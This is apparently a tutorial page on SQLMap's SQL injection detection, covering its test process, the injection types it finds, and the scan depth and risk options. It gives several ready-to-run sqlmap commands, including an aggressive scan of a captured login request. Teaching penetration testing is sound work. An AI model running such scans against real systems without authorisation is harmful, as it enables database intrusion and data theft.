Vulnerability Detection
Learn about SQLMap's vulnerability detection capabilities
SQLMap provides powerful capabilities for detecting SQL injection vulnerabilities in web applications. This section covers the core detection features and how to optimize them for your specific testing scenarios.
Understanding SQLMap's Detection Process
SQLMap employs a systematic approach to detect SQL injection vulnerabilities:
- Parameter Analysis: SQLMap analyzes the target parameters (URL parameters, form data, cookies, etc.)
- Payload Injection: It injects specially crafted payloads designed to trigger SQL errors or behavioral changes
- Response Analysis: The tool examines server responses for signs of vulnerability
- Confirmation: SQLMap confirms vulnerabilities through multiple tests to minimize false positives
Basic Detection Example
sqlmap -u "http://vulnerable-website.com/page?id=1" --batch
When executed, SQLMap will:
- Test the
idparameter for various injection types - Automatically determine the database management system (DBMS)
- Report detailed findings about any vulnerabilities discovered
Detection Capabilities
SQLMap can detect a wide range of SQL injection vulnerabilities:
| Injection Type | Description | Detection Method |
|---|---|---|
| Boolean-based blind | Uses true/false conditions to extract data | Analyzes differences in responses |
| Time-based blind | Uses time delays to infer data | Measures response time variations |
| Error-based | Extracts data through error messages | Analyzes error responses |
| UNION query-based | Uses UNION SQL operator to extract data | Combines queries to retrieve data |
| Stacked queries | Executes multiple SQL statements | Tests for ability to run multiple queries |
Key Detection Parameters
SQLMap offers several parameters to control the detection process:
sqlmap -u "http://example.com/page?id=1" --level=3 --risk=2 --technique=BEU
This command:
- Sets test thoroughness to level 3 (includes cookies and HTTP headers)
- Sets risk level to 2 (includes time-based tests)
- Focuses on Boolean, Error, and UNION-based techniques
In This Section
- Test Intensity - Learn how to control the intensity and risk level of SQLMap scans
- Injection Techniques - Explore the various SQL injection techniques supported by SQLMap
- Optimizing Detection - Discover methods to optimize and fine-tune the detection process
Real-World Detection Scenario
In a penetration testing engagement, you might encounter a login form that appears secure. Here's how you might approach it with SQLMap:
# Capture the login request with a proxy tool and save to login.txt
sqlmap -r login.txt --level=5 --risk=3 --batch
This approach:
- Tests all parameters in the login request
- Uses the highest level of thoroughness
- Employs aggressive testing techniques
- Runs automatically without user interaction
By mastering SQLMap's vulnerability detection capabilities, you can efficiently identify SQL injection vulnerabilities in web applications while minimizing false positives and unnecessary server load.